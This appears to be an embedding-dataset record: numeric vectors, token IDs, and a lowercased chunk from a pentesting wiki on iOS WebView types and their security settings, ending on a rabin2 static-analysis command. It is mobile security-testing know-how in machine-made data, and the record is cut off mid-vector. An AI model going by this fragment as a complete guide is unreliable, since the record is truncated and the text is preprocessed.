-0.33778882026672363, -0.23407341539859772, -0.6945578455924988, 0.6933607459068298, -0.2669617533683777, -0.18790079653263092, 1.1735475063323975, -0.3389504551887512, -0.21552574634552002, -0.5364784002304077, 0.05477038398385048, -0.7276468873023987, 0.4619269371032715, 0.6363428831100464, -0.0037695015780627728, 0.06205293908715248, 0.5101620554924011, -0.19826209545135498, 1.2133536338806152, -0.2547609210014343, 0.1519184708595276, 0.11874575912952423, -1.337967038154602, -0.18124721944332123, -0.08667373657226562, 0.3199692964553833, 0.17610493302345276, 0.21792209148406982, -0.7214337587356567, 0.49784576892852783, 0.337850421667099, -0.07019145786762238, 0.4320967197418213, -1.0271333456039429, -0.3930191099643707, -0.5379492044448853, 0.15235063433647156, -0.417432576417923, -0.04390927404165268, -0.24048186838626862, -0.05085093155503273, -0.28697746992111206, -0.7398892641067505, -0.4152708053588867, 0.5234125256538391, -0.2285366803407669, -0.04570121690630913, -0.9165298342704773, 0.3311013877391815, -0.5238642692565918, -0.18416160345077515, -0.36614322662353516, -0.6940431594848633, -0.1635199785232544, -0.576709508895874, -0.02737089805305004, -0.7099890112876892, -0.6408666968345642, 0.2586575448513031, -0.12707379460334778, -0.8023481369018555, 0.10079462081193924, 0.09945023059844971, 0.379477322101593, 0.45000120997428894, -0.1123659685254097, -0.10823843628168106, 0.45129284262657166, -0.42180177569389343, 0.47830432653427124, 0.14133967459201813, -0.31981372833251953, 0.23513802886009216, 0.2698638439178467, 0.6646989583969116, 0.1370082050561905, -0.27643564343452454, -0.5944774746894836, 0.19305364787578583, -0.7682695984840393, 0.14253488183021545, -0.7659155130386353, 0.2660582363605499, 0.5373063683509827, -0.06758009642362595, -0.30013737082481384, 0.8741500377655029, -0.10572731494903564, 0.7133172154426575, -0.33968859910964966, 0.01009787805378437, 0.27294307947158813, 0.5571783185005188, -0.5804551839828491, -0.5184870958328247, 0.44643834233283997, 0.13040415942668915, 0.01821182295680046, 0.11612334847450256, -0.1927623301744461, 0.4610691964626312, -0.8761823773384094, 0.26988860964775085, -1.0044376850128174, 0.003906714264303446, 0.38664376735687256, -0.15582390129566193, 0.2846100628376007, -0.23920480906963348, -0.06751490384340286, 0.560726523399353, -0.1757260411977768, 0.25760677456855774, -0.7914254665374756, -0.29996758699417114, 0.4265229403972626, -0.02720954455435276, -0.026047727093100548, 0.05191093310713768, -0.06194566935300827, 0.400485098361969, 0.6647780537605286, -0.5012768507003784, 0.3917059302330017, 0.5171716809272766, -0.24180658161640167, 0.285476952791214, -0.43070951104164124, 0.4242148995399475, -0.04734695702791214, 0.307621031999588, -0.8270955085754395, -0.7830986976623535, 0.22757872939109802, 0.6338983774185181, 0.001443657441996038, -0.07836377620697021, -0.48272770643234253, 0.2019120454788208, 0.3474653959274292, 0.3239165246486664, -0.13627777993679047, 0.21132922172546387, -0.6488076448440552, 0.3320985436439514, -0.6448200345039368, 0.46873196959495544, -0.35674363374710083, 0.04996359348297119, 0.2925283908843994, 0.26543694734573364, 0.07199902832508087, 0.062099914997816086, 0.36112964153289795, -0.48754239082336426, 0.19151118397712708, 0.2751118242740631, 0.6579116582870483, 0.1693488508462906, 0.030314290896058083, -0.4082452356815338, -0.08892437815666199, 0.2561761736869812, 0.32220959663391113, -0.49429014325141907, 0.21036186814308167, 0.36316800117492676, -0.13671322166919708, -0.43683239817619324, 0.647466242313385, -0.26828861236572266, -0.4845193922519684, 0.17636317014694214, -0.17102639377117157, -0.01628687232732773, 0.611396849155426, -0.5425633788108826, -0.024239346385002136, -0.37774235010147095, 0.07510863244533539, -0.20850172638893127, -0.08906428515911102, -0.1776544451713562, -0.6598712801933289, -0.18265466392040253, -0.026104064658284187, 0.0875716432929039, 0.7862123250961304, 0.34633564949035645, -0.24204638600349426, -0.011684784665703773, 0.8857948780059814, 0.5586938261985779, 0.49009349942207336, 0.6208897233009338, 0.07025695592164993, 0.16541698575019836, -0.14780966937541962, -0.16063277423381805, -0.7846130728721619, -0.41877567768096924, 0.4411642849445343, -0.4796847403049469, -1.3701560497283936, 0.06793060153722763, -0.5912419557571411, -0.2573792040348053, -0.11900094896554947, -0.1118394210934639, -0.33089080452919006, -0.46921712160110474, 0.38611626625061035, -0.5012255311012268, 0.029075004160404205, 0.7243814468383789, -0.7127206921577454, -0.6002785563468933, 0.4474261403083801, -0.18486154079437256, 0.30720433592796326, -0.19199828803539276, 0.3248026371002197, -0.2614665627479553, 1.1677497625350952, -0.17621828615665436, -0.61330246925354, -0.3098539710044861, 0.07312973588705063, -1.0674492120742798, -0.15597544610500336, -0.010101714171469212, -0.8296915292739868, 0.41427376866340637, -0.8723622560501099, -0.4932572543621063, 0.2822568118572235, 0.18751779198646545, -0.3815207779407501, -0.536839485168457, 0.08236856013536453, 0.41664737462997437, -0.19804082810878754, -0.12133817374706268, 0.8231692910194397, 0.19880464673042297, 0.6093258857727051, -0.9656562209129333, -0.561608612537384, -0.5717490911483765, -0.5947645306587219, -0.6613991856575012, 0.5655180811882019, -0.5700581073760986, -0.40882405638694763, -0.13827858865261078, -0.20155081152915955, -0.3190917670726776, -0.02756376937031746, -0.2964968681335449, 0.10832549631595612, 0.9342781901359558, -0.20180924236774445, 0.7584236860275269, 0.11145151406526566, -0.06997358053922653, 0.2780073881149292, 0.22601041197776794, 1.0935062170028687, -0.2959449887275696, 0.9723442196846008, 0.8879621028900146, -0.2167258858680725, -0.033546969294548035, -0.17061056196689606, 0.7993626594543457, 0.4494785964488983, -0.10896752029657364, -0.6029988527297974, 0.1694725751876831, -0.7853126525878906, -0.5170220732688904, 0.2155616730451584, 0.5071803331375122, 0.18927468359470367, -0.11219365149736404, -0.8317142724990845, -0.3503987491130829, -1.2534178495407104, 0.10716892778873444, -0.23470734059810638, 0.5909320712089539, 0.4005759060382843, -0.22969253361225128, 0.3298112452030182, -1.0768005847930908, 4.3985443115234375, 0.6970741748809814, 0.5374027490615845, -0.07050406187772751, -0.3119497299194336, 0.31636500358581543, 1.1156761646270752, -1.0265707969665527, -0.2614835202693939, -0.47946953773498535, 0.45384761691093445, 0.43374478816986084, 0.6638034582138062, 0.6235793828964233, 0.19638220965862274, 0.5536432266235352, -0.497730016708374, 0.37988027930259705, 0.5487638115882874, -0.3527987003326416, -0.4082011580467224, 0.0783587321639061, 0.022487862035632133, 1.3222042322158813, 0.2555901110172272, 0.23943574726581573, 0.04045429453253746, -0.22487682104110718, -0.10400833934545517, -0.4548838436603546, 0.23142775893211365, -0.3069254457950592, 0.9407014846801758, -0.600342869758606, -0.29349690675735474, 0.5511964559555054, 0.24048449099063873, -0.9765098690986633, -0.30126065015792847, -0.0932329073548317, 0.08451669663190842, -0.3844129145145416, -0.1227274090051651, -0.11441951245069504, -0.5092121362686157, 0.11602219194173813, 0.2911204993724823, 0.3781266212463379, 0.5066078901290894, -0.5994119048118591, 0.19394686818122864, -0.5668977499008179, 0.3793632388114929, -0.36855360865592957, -0.6484968662261963, -0.8421990275382996, 0.5697088241577148, 0.06266847997903824, 0.1976860612630844, -0.3540782034397125, 0.5370380878448486, -0.1912004053592682, -0.18320542573928833, 0.674747884273529, -0.7315913438796997, 0.6188185214996338, -0.2491798847913742, 1.357244610786438, 0.0690496489405632, -0.22800196707248688, -0.4689430594444275, -0.25715330243110657, 0.03526674211025238, -0.7503560781478882, -0.17323608696460724, 0.594947338104248, -0.2688571512699127, 0.3476734161376953, 0.10688084363937378, -0.5379447937011719, 0.5530277490615845, -0.022307412698864937, -0.4292784631252289, -0.16765467822551727, 0.27690431475639343, 0.6340476870536804, -0.30579879879951477, -0.13472406566143036, -0.010192196816205978, 0.5433741211891174, 0.7207613587379456, -0.18105609714984894, -0.36319780349731445, 0.5758143067359924, -0.05014671012759209 ]
[ 11186, 1998, 10960, 2011, 8103, 2075, 24978, 10288, 29048, 1011, 1035, 13354, 2378, 1024, 2057, 2448, 1996, 2168, 2742, 2153, 1024, 1006, 1014, 2595, 2487, 2278, 2692, 24434, 2692, 28332, 1007, 24978, 10288, 29048, 1011, 1035, 13354, 2378, 13465, 1024, 1026, 1052, 2243, 24759, 15916, 2378, 1024, 1014, 2595, 14526, 2575, 21619, 24434, 2546, 2692, 6887, 1012, 10093, 13910, 2527, 1012, 10013, 1012, 3745, 1006, 1019, 1012, 1017, 1007, 1019, 2497, 2575, 3207, 16576, 2581, 1011, 1042, 2692, 2683, 2497, 1011, 4700, 2850, 1011, 3938, 19797, 1011, 4090, 2094, 2581, 21486, 17465, 2278, 2581, 27531, 2487, 1006, 1016, 1007, 1013, 2797, 1013, 13075, 1013, 16143, 1013, 14012, 1013, 4646, 1013, 2321, 2063, 2575, 2050, 27814, 2546, 1011, 1015, 3540, 2581, 1011, 4008, 2050, 2549, 1011, 1037, 2683, 2063, 2692, 1011, 1020, 3540, 27531, 2497, 26187, 7011, 19481, 1013, 23921, 1060, 1012, 10439, 1013, 13354, 7076, 1013, 3745, 1012, 10439, 10288, 1028, 1006, 1014, 2595, 2487, 2278, 2692, 24434, 21926, 8889, 1007, 1011, 1031, 24978, 10288, 29048, 1035, 13354, 2378, 1033, 2128, 2102, 1024, 1026, 1052, 2243, 24759, 15916, 2378, 1024, 1014, 2595, 10790, 29292, 2546, 2581, 2683, 10790, 4012, 1012, 6207, 1012, 4684, 20564, 1012, 6631, 10288, 29048, 1006, 1015, 1012, 1019, 1007, 6421, 2063, 2549, 2546, 17134, 2581, 1011, 4868, 2620, 2549, 1011, 4008, 28154, 1011, 1037, 19841, 2050, 1011, 6640, 2546, 21057, 27717, 23632, 2549, 16409, 1015, 1006, 1016, 1007, 1013, 2797, 1013, 13075, 1013, 16143, 1013, 14012, 1013, 4646, 1013, 1019, 2063, 23833, 2581, 2497, 26976, 1011, 20069, 2692, 2549, 1011, 4601, 2094, 2692, 1011, 6640, 2629, 2497, 1011, 20069, 2850, 2497, 2683, 6679, 2692, 2581, 2575, 2094, 1013, 4684, 20564, 1012, 10439, 1013, 13354, 7076, 1013, 4012, 1012, 6207, 1012, 4684, 20564, 1012, 6631, 10288, 29048, 1012, 10439, 10288, 1028, 2004, 2017, 2064, 2156, 2045, 2024, 2048, 10439, 14305, 2920, 1024, 3745, 1012, 10439, 10288, 2003, 6016, 1996, 3793, 5371, 1006, 2270, 1012, 5810, 1011, 3793, 1998, 2270, 1012, 5371, 1011, 24471, 2140, 1007, 1012, 4012, 1012, 6207, 1012, 4684, 20564, 1012, 6631, 10288, 29048, 1012, 10439, 10288, 2029, 2003, 4909, 1998, 2097, 2832, 1996, 3793, 5371, 1012, 2065, 2017, 2215, 2000, 4553, 2062, 2055, 2054, 1005, 1055, 6230, 2104, 1011, 1996, 1011, 7415, 1999, 3408, 1997, 26726, 2278, 1010, 2057, 16755, 2000, 2202, 1037, 2298, 2012, 1996, 4722, 4455, 2013, 1000, 5622, 2497, 2595, 15042, 1012, 1040, 8516, 12322, 1000, 1012, 2005, 2742, 2017, 2064, 2224, 10424, 8524, 1011, 7637, 1998, 2059, 10667, 6748, 2046, 1996, 4725, 2008, 2017, 2424, 2062, 5875, 2011, 8402, 1996, 8073, 7013, 24646, 5910, 1012, 4684, 7279, 22199, 2075, 1011, 102 ]
hack_tricks
434.txt
4
[CLS] ios webviewswebviews typeswebviews are in - app browser components for displaying interactive web content. they can be used to embed web content directly into an app's user interface. ios webviews support javascript execution by default, so script injection and cross - site scripting attacks can affect them. uiwebview : uiwebview is deprecated starting on ios 12 and should not be used. it shouldn't be used. javascript cannot be disabled. wkwebview : this is the appropriate choice for extending app functionality, controlling displayed content. javascript is enabled by default but thanks to the javascriptenabled property of wkwebview, it can be completely disabled, preventing all script injection flaws. the javascriptcanopenwindowsautomatically can be used to prevent javascript from opening new windows, such as pop - ups. the hasonlysecurecontent property can be used to verify resources loaded by the webview are retrieved through encrypted connections. wkwebview implements out - of - process rendering, so memory corruption bugs won't affect the main app process. sfsafariviewcontroller : it should be used to provide a generalized web viewing experience. these webviews can be easily spotted as they have a characteristic layout which includes the following elements : a read - only address field with a security indicator. an action ( " share " ) button. a done button, back and forward navigation buttons, and a " safari " button to open the page directly in safari. javascript cannot be disabled in sfsafariviewcontroller and this is one of the reasons why the usage of wkwebview is recommended when the goal is extending the app's user interface. sfsafariviewcontroller also shares cookies and other website data with safari. the user's activity and interaction with a sfsafariviewcontroller are not visible to the app, which cannot access autofill data, browsing history, or website data. according to the app store review guidelines, sfsafariviewcontrollers may not be hidden or obscured by other views or layers. discovering webviews configurationstatic analysisuiwebview $ rabin2 - zz. / wheresmybrowser | egrep " uiwebview $ " 489 0x0002fee9 0x10002
[ -0.014571876265108585, -0.22002388536930084, -0.37001702189445496, 0.46506258845329285, -0.8282054662704468, 0.33678513765335083, -0.15660709142684937, -0.39850059151649475, 0.9729250073432922, 0.5410950183868408, 0.017010504379868507, -0.45303094387054443, 0.18369996547698975, 0.05275847390294075, 0.07917658984661102, -0.38157129287719727, -1.0135129690170288, -0.3864131569862366, -0.8230370879173279, 0.24968034029006958, 0.8544859886169434, 0.2441660463809967, -0.9734324216842651, -1.3574550151824951, -0.68437260389328, 1.1942375898361206, 0.6308386325836182, -0.20502012968063354, 1.1301348209381104, 0.8901036381721497, -0.14019767940044403, -0.36814966797828674, -0.2565517723560333, -0.48207858204841614, 0.2061518132686615, -0.05592883378267288, 0.6479412317276001, -0.48863181471824646, -0.1146426796913147, -0.7783956527709961, 0.5267336368560791, -0.25101861357688904, -0.428888201713562, -0.04939670488238335, 0.24146656692028046, -0.403424471616745, 0.771287739276886, -0.7829220294952393, -0.30634915828704834, -0.08465404063463211, 0.28580084443092346, 0.07477760314941406, -0.6400720477104187, -0.14667855203151703, -0.2520459294319153, 0.2598179578781128, -0.1437387615442276, -0.4602784812450409, -0.28973960876464844, 0.7341068387031555, 0.1624908149242401, 0.26405519247055054, 0.06312336027622223, -0.7072354555130005, 0.29854705929756165, 0.3223859965801239, 0.27760928869247437, -0.28623253107070923, -0.08862540870904922, 0.02261926233768463, -0.5031530261039734, 0.3694716989994049, -0.8490118384361267, -0.7279518246650696, -0.6000349521636963, -0.37125593423843384, -0.3135899305343628, 0.2019449770450592, -0.08695876598358154, 0.3455497622489929, -0.28506121039390564, 0.25241819024086, -0.069210946559906, -0.06752313673496246, -0.8832690119743347, 0.07134044915437698, 0.01700248010456562, -0.06997957825660706, -0.8979634046554565, -0.04215249791741371, 0.03227197006344795, 0.44381341338157654, -1.0621392726898193, -0.5343995094299316, 0.22240759432315826, 0.7832354307174683, 0.20717452466487885, 0.019546713680028915, -0.5749458074569702, 0.10827135294675827, 0.6839974522590637, 0.8291347026824951, -0.6069707870483398, 0.6850260496139526, -0.8434491157531738, 0.23587475717067719, 0.7469577789306641, -0.8604779243469238, -0.8073658347129822, -0.9789167046546936, 0.013313193805515766, 0.19112183153629303, 0.36273884773254395, -0.4571218192577362, 0.02196749486029148, 0.06593441218137741, -0.10726511478424072, 0.42569443583488464, 0.10278256982564926, 0.4321877956390381, -0.1549319624900818, -0.33123624324798584, 0.6529440879821777, -0.0167511198669672, 0.49769076704978943, 0.3589423596858978, 0.35697731375694275, 1.133559226989746, -0.5878832936286926, -0.44971412420272827, 0.1332084834575653, 0.040279339998960495, -0.08043675124645233, 0.9502829909324646, -0.3585556447505951, 0.3610939383506775, 0.017685022205114365, -0.026325395330786705, 0.42804500460624695, -0.64690101146698, 0.005931842140853405, 0.5786486268043518, 0.07249455899000168, 1.2745476961135864, 0.41381019353866577, -0.024454543367028236, -0.4375297725200653, -1.0123249292373657, -0.506557822227478, 0.03714501112699509, 0.014147792011499405, 0.23796115815639496, 0.4631023406982422, -0.3121665418148041, -0.5509966611862183, 0.21528223156929016, -0.5893450975418091, 0.40948790311813354, 0.0398806631565094, -0.1535821557044983, -0.190254807472229, 0.7658795714378357, -0.12251827120780945, 0.13811548054218292, -0.6882826089859009, 0.3295365869998932, -0.6238982081413269, -0.08755635470151901, -0.5028466582298279, -0.25306275486946106, 0.32866954803466797, 0.4647497534751892, -0.37203988432884216, -0.1695461869239807, 0.8381348848342896, 1.022891640663147, 0.16379353404045105, -0.02921217493712902, 0.09394901245832443, 0.238503560423851, -0.45350611209869385, 1.1900603771209717, 0.7128536105155945, 1.0643450021743774, -0.18489864468574524, 0.22212933003902435, -0.4949464797973633, -0.43332451581954956, 0.20115333795547485, -0.07841377705335617, -0.04916369542479515, 0.7417000532150269, -0.7645326852798462, 0.36009761691093445, 0.24045701324939728, 0.3763209283351898, -1.1769218444824219, -0.2525331377983093, 0.33850568532943726, -1.0081967115402222, -0.5583997964859009, 0.5323273539543152, -0.4603174328804016, -0.13665637373924255, -0.19522354006767273, -0.7202858328819275, 0.5134539008140564, 0.4853917956352234, -0.46191665530204773, 1.2583414316177368, 0.6576679944992065, -0.20757463574409485, -0.465013325214386, 0.24080543220043182, 0.566839337348938, -0.12105624377727509, -0.2804414927959442, 0.4111938178539276, -0.19130991399288177, 0.11445871740579605, 0.43274247646331787, 0.617760181427002, 0.9878034591674805, 0.8589296340942383, -0.4075496196746826, 0.4323239028453827, -0.23847894370555878, 0.3416393995285034, -0.1282520592212677, 0.33047211170196533, 0.03712734207510948, 0.3075045943260193, 0.6167702078819275, 0.7350881695747375, 0.04507749527692795, -0.0742020308971405, -0.3223804533481598, 0.408902108669281, 0.2791700065135956, -0.2958502173423767, -0.3785373270511627, 0.8522383570671082, 0.7063442468643188, 0.3528279662132263, 0.08981794118881226, 0.08873159438371658, 0.09967269748449326, 0.4385799467563629, 0.3723006546497345, 0.34718194603919983, 0.3189554512500763, 0.9058213233947754, 0.8071691393852234, -0.5687118172645569, -0.5988776683807373, -0.6186683773994446, 0.631682276725769, 0.7670381665229797, -0.46692752838134766, -0.3185400068759918, -0.5399745106697083, 0.593762218952179, -0.07170246541500092, 0.14322328567504883, 0.3851689100265503, 0.636444628238678, 0.5610188841819763, 0.35604628920555115, -0.9822090268135071, -1.382011890411377, -0.5545609593391418, -0.2787451148033142, -0.4943479895591736, -0.3947351574897766, -1.3639318943023682, -0.4618721008300781, 0.30569857358932495, -0.784753143787384, 0.5702500343322754, -0.031523529440164566, -0.0678519532084465, 0.008577410131692886, -0.22074303030967712, 0.5352995991706848, -0.01921314187347889, 0.5660450458526611, -0.813694417476654, 0.41960734128952026, -0.04130098596215248, 0.9406518340110779, -0.5467817187309265, 0.049109213054180145, -0.19503049552440643, -0.027407919988036156, 0.009837414138019085, -0.3178226947784424, 0.21678155660629272, 0.22171176970005035, -0.3826727271080017, -0.3581041991710663, -0.050085559487342834, -0.1310432255268097, 0.13307176530361176, 0.4393228590488434, -0.5772965550422668, 0.7229943871498108, -0.11805420368909836, 0.09378616511821747, 0.7894001603126526, 0.37618815898895264, -0.4479486644268036, 0.299564003944397, -0.07009698450565338, 0.356699138879776, -0.5199193954467773, 0.3547186851501465, 0.124042809009552, 0.3346320688724518, -0.32293936610221863, -0.12222112715244293, -0.08458030223846436, -0.44923463463783264, -0.1876869797706604, -0.39817559719085693, -0.034210458397865295, 0.5369138121604919, -0.46418115496635437, -1.0665103197097778, -0.3188323676586151, -0.42093250155448914, -0.6201066374778748, -0.4721880257129669, -0.26837819814682007, 0.8777949810028076, 0.6187160611152649, 0.1342649757862091, 0.46858224272727966, -0.3324783742427826, 0.49654513597488403, 0.19320666790008545, 0.8922654986381531, -0.9683570265769958, 0.7980226874351501, 0.30793115496635437, -0.3097613751888275, 0.6895484924316406, 0.4812563955783844, -0.34790486097335815, 0.06867656856775284, -0.1533837467432022, -0.7850919365882874, -0.3490002751350403, 0.42858344316482544, -0.05739757791161537, -0.15671966969966888, 0.3298291862010956, -1.0097955465316772, -0.4701225757598877, -0.16757433116436005, 0.3504897952079773, 0.932040274143219, 0.25093182921409607, -0.1225401982665062, -0.029770830646157265, -0.239709734916687, -0.45054030418395996, 0.04030686616897583, 0.8062514662742615, 0.04599746689200401, 0.026483137160539627, 0.2157519906759262, 0.05589909479022026, -0.09128493815660477, 0.3470175862312317, -0.03885110095143318, -1.0377960205078125, 0.6094693541526794, 0.5545690655708313, 0.06008577346801758, 0.2094448059797287, 0.16471733152866364, -0.3261816203594208, 0.1040346696972847, 0.4737636148929596, 0.13954389095306396, -0.4471759498119354, -0.7052774429321289, -0.06567410379648209, 0.17028926312923431, -0.6147014498710632, 0.4976130723953247, 0.06997013837099075, 0.6033914089202881, 0.014117411337792873, -1.0177408456802368, -0.18776489794254303, -0.17350929975509644, 0.5404572486877441, 0.14014165103435516, 0.25502267479896545, 0.5436285138130188, 1.103163480758667, -0.01594788022339344, -0.06567017734050751, -0.7664772868156433, -0.2982189953327179, -0.20410504937171936, 0.8039522171020508, 0.161023810505867, 0.13482385873794556, -0.025153998285531998, 0.28768274188041687, -0.1717866063117981, -0.07437947392463684, 0.4621208906173706, 0.11309844255447388, -0.6268901824951172, -0.665518045425415, 0.4815419316291809, 0.37173253297805786, -0.375626802444458, -0.12710604071617126, -0.016523802652955055, 0.21912331879138947, 0.7921606302261353, -0.4827874004840851, -0.4545532166957855, -0.47340941429138184, 0.12742912769317627, 0.005247373133897781, 0.20621228218078613, -0.145330548286438, -0.3284522294998169, -0.4593379497528076, -0.4204427897930145, 0.4532497525215149, 0.6992262601852417, 0.4064320921897888, 0.061811067163944244, -1.174267292022705, -0.04568056762218475, 0.7546922564506531, -0.5196561217308044, -0.6003627181053162, -0.19720546901226044, 0.2966766655445099, -0.04338441789150238, 0.11792118102312088, -1.121130347251892, -0.038081858307123184, 0.6993268728256226, -1.2243611812591553, 1.04405677318573, -0.644669771194458, -0.31193807721138, -0.4638782739639282, 0.020081639289855957, -0.3303316533565521, 0.28115761280059814, -0.2656531035900116, 0.19475720822811127, -0.21784870326519012, 0.00763904582709074, 0.04195982962846756, -0.13068245351314545, 0.8304791450500488, 0.1943025290966034, -0.18658238649368286, 0.5742158889770508, 0.21620604395866394, -0.08557885885238647, 0.40549492835998535, -0.6877118349075317, -0.4568077027797699, 0.30180084705352783, -0.8483925461769104, 0.10570891946554184, 0.6520641446113586, -0.3659548759460449, 0.10833531618118286, -0.7834051251411438, 0.3759693205356598, -0.10751952975988388, 0.435896098613739, -0.4217928946018219, -0.4573526084423065, -0.26201966404914856, -0.08547632396221161, -0.23014500737190247, 0.281482458114624, 0.4309341013431549, 0.10393024235963821, 0.20361118018627167, 0.20523379743099213, -0.5759149193763733, -0.9637817144393921, -0.4276631474494934, 0.08319800347089767, 0.06476277112960815, -0.10971573740243912, 1.442474603652954, -0.40798646211624146, -0.5102787613868713, -0.2364235818386078, -0.11734966933727264, 0.12667083740234375, -0.6154175996780396, 0.6075911521911621, -0.31256571412086487, 0.009325445629656315, -0.01625528372824192, 0.5352276563644409, 0.44121065735816956, 0.255603551864624, -0.3173580765724182, 0.7793177366256714, -0.23290356993675232, -0.11191724985837936, 0.05103728920221329, 0.7107469439506531, -0.283835768699646, -0.2929474413394928, 0.2781773805618286, 0.7012226581573486, -0.5372834205627441, 0.2552829086780548, -0.15154632925987244, -0.3688240349292755, -0.937536895275116, -1.123476266860962, -0.15619206428527832, -0.4685722589492798, 0.7256346940994263, -0.25366857647895813, -0.14222721755504608, -0.20512473583221436, 0.6381842494010925, -0.6230866312980652, -0.4144931435585022, 0.5170970559120178, -0.012779421173036098, 0.0087521281093359, -0.23921430110931396, -0.2552739977836609, 0.24877332150936127, -0.6047536730766296, 0.33985844254493713, 0.033680260181427, 0.2699875235557556, 0.09222670644521713, -0.08082034438848495, -0.04122475907206535, 0.6282472014427185, -0.08158955723047256, -0.8676468729972839, -0.16262364387512207, -0.2636393904685974, 0.20995396375656128, 0.12250682711601257, 0.24663150310516357, -0.8677843809127808, 0.5461809635162354, -0.43532681465148926, -0.05510789155960083, 0.3064776659011841, -0.4176608622074127, 0.07378502190113068, 0.20226223766803741, 0.40746521949768066, -0.40672051906585693, 0.2563369870185852, -0.4207455515861511, 0.6770322918891907, 0.5040351748466492, -0.42745816707611084, -1.0623952150344849, 0.25914275646209717, -0.48209717869758606, -1.353479027748108, 0.6545438766479492, 0.3265400230884552, -0.19565042853355408, -0.3910068869590759, 0.04073956981301308, 0.6440781950950623, -0.04172229766845703, 0.13021788001060486, 0.3585609495639801, 0.09651168435811996, 0.6577741503715515, -0.2656264007091522, 0.49520963430404663, 0.6410574316978455, -0.27932605147361755, 0.22301623225212097, 0.2694321274757385, 0.14490967988967896, 0.16674765944480896, -0.560786247253418, -0.521033525466919, -0.7233026623725891, -0.1264728605747223, 0.36631226539611816, -0.4891168177127838, 0.16245806217193604, 0.0028721257112920284, -1.076032280921936, -0.14851272106170654, 0.30596113204956055, 0.2530110776424408, 0.03334156423807144, 0.6251415610313416, -0.11330612748861313, 0.3250414729118347, 0.3248877227306366, -0.09869013726711273, -0.5895261168479919, -0.20877376198768616, 0.39255568385124207, -0.4184723496437073, -0.4258006513118744, 1.2486164569854736, 0.18965505063533783, -0.5780314803123474, -0.9534947276115417, -0.05733789503574371, -0.055326152592897415, -0.03265867009758949, 0.18051743507385254, 0.028824618086218834, 0.17951619625091553, -0.04437408223748207, -0.17355042695999146, 0.23258332908153534, 0.552540123462677, -0.047696325927972794, -0.4566582441329956, 0.16806401312351227, -0.21134507656097412, -0.16088491678237915, 0.48305270075798035, -1.0303875207901, -0.5143981575965881, -0.6166775822639465, 0.17365877330303192, 0.3354470729827881, -0.6791423559188843, 1.5178250074386597, -0.4122929573059082, 0.7906861305236816, -0.2420894056558609, 0.10162042081356049, 1.30382239818573, -0.2964104413986206, 0.26708531379699707, 0.7541593909263611, 0.5216007232666016, -0.727914035320282, 0.24941369891166687, 1.1497259140014648, 0.20331156253814697, 0.09041915833950043, -0.7183318138122559, -0.45525115728378296, 0.6158460378646851, 0.3252731263637543, -0.5846306681632996, -0.2651183009147644, -0.75117027759552, -0.6194656491279602, 0.31028997898101807, 0.18867407739162445, 0.2805064022541046, -0.10538393259048462, 0.03268175944685936, -0.40259256958961487, -0.2570492923259735, -0.42148154973983765, 0.4184349775314331, -0.34514254331588745, 0.24723106622695923, -0.6132213473320007, 0.12393265962600708, -0.5166178941726685, -0.285915732383728, -0.5227449536323547, -0.36532166600227356, -0.33402711153030396, -0.7022953033447266, -0.520394504070282, -0.43623584508895874, -0.6914346814155579, -0.12839750945568085, -0.641071081161499, 0.5737833380699158, -0.5108286738395691, -0.5921716690063477, -0.40636417269706726, 1.0507603883743286, 0.04950852692127228, 0.2002205103635788, 0.4864767789840698, 0.7936688661575317, 0.2611022889614105, -0.16643685102462769, 0.08817338198423386, 0.3069530427455902, 0.02604546584188938, 0.37558040022850037, 0.1456855982542038, -0.1429818570613861, 0.022965990006923676, -0.01621619053184986, -0.5099685192108154, -0.06535889208316803, -0.3206692337989807, 0.04542013257741928, 0.1754741668701172, 0.5135477781295776, 0.547677218914032, 0.4634488523006439, -0.02134714275598526, -0.00268045742996037, -0.35310235619544983, 0.7031328082084656, 0.7177647948265076, -0.30883505940437317, -0.02188592031598091, -0.18136157095432281, 0.6247301697731018, -0.5565003156661987, 0.06854415684938431, 0.10029134899377823, -0.12534348666667938, 0.22337475419044495, 0.2786020040512085, 0.23681052029132843, -0.06385281682014465, 0.06277282536029816, 0.8697399497032166, 0.6326280236244202, 0.9593036770820618, -0.32203710079193115, 0.6538320183753967, 0.3302200734615326, -1.132859468460083, 0.09515602886676788, -0.5193693041801453, 0.06553234159946442, 0.4653574526309967, -0.4407486021518707, -0.2253701090812683, -0.6805559992790222, -0.315885066986084, -0.47603240609169006, -0.21248780190944672, -0.2145998179912567, 0.8852278590202332, 0.4604618549346924, 0.003760585794225335, 0.3682354688644409, -0.657210648059845, -0.6739221215248108, 0.06065919250249863, 0.5932316780090332, -0.4988359808921814, -0.8386936783790588, 0.29529261589050293, 0.9063999056816101, 0.35821977257728577, -0.38377103209495544, -0.3540050685405731, 0.10125706344842911, 0.25034165382385254, -0.0204175878316164, 0.6518018245697021, -0.25724783539772034, -0.2677837610244751, 0.4978247582912445, -0.8276814222335815, -0.21603195369243622, -0.12016598880290985, 0.3838546574115753, 0.1390630602836609, 0.06720025092363358, -0.18572403490543365, 0.11189574003219604, 0.3340030312538147, -0.2923372685909271, 0.19979530572891235, 0.24597015976905823, 0.02794872224330902, -0.15379919111728668, -0.1131792739033699, -0.6211342811584473, -0.06520279496908188, 0.5650184154510498, 0.08967101573944092, 0.276196151971817, 0.26658767461776733, 0.932357907295227, -0.7999720573425293, -0.30695921182632446, 0.4571617543697357, 0.0890117734670639, -0.10678444057703018, 0.5444532036781311, -0.6426287293434143, 0.23661957681179047, -0.15000243484973907, -0.1307012289762497, 0.20147587358951569, -0.4313066005706787, -0.03875826671719551, 0.2032577246427536, -0.2905075252056122, 0.6958205699920654, -0.4519246220588684, 0.15171055495738983, -0.4232771694660187, 0.16127938032150269, 0.5086004137992859, -0.06520730257034302, -0.09602101147174835, 1.0071744918823242, 0.7580704689025879, 0.5057298541069031, 0.19872498512268066, 0.4511353075504303, -0.16828829050064087, -0.25783783197402954, 0.5379003882408142, -0.10639948397874832, -0.5717487335205078, 0.41109660267829895, -0.1526234894990921, -0.8528285026550293, -0.6107485890388489, 0.03458999842405319, 0.5014775395393372, 0.11861835420131683, 0.3634491264820099, -0.3984605371952057, -0.17386507987976074, -0.4244389832019806, 0.0036469483748078346, -0.07389451563358307, -0.2697969079017639, -0.01074639055877924, -0.35502371191978455, -1.0157846212387085, 0.6429511308670044, -0.18573014438152313, 0.4531974792480469, -0.12867207825183868, 0.5561246871948242, 0.1988382488489151, 0.09701370447874069, -0.4539310932159424, -0.195830836892128, -0.5252208113670349, 0.22946937382221222, 0.1541278064250946, -0.21067176759243011, -0.2315785437822342, -0.3964461088180542, 0.2719012498855591, 0.2570509612560272, -0.4125891923904419, -0.9283576607704163, 0.11849343776702881, 0.07608035206794739, -1.2934234142303467, 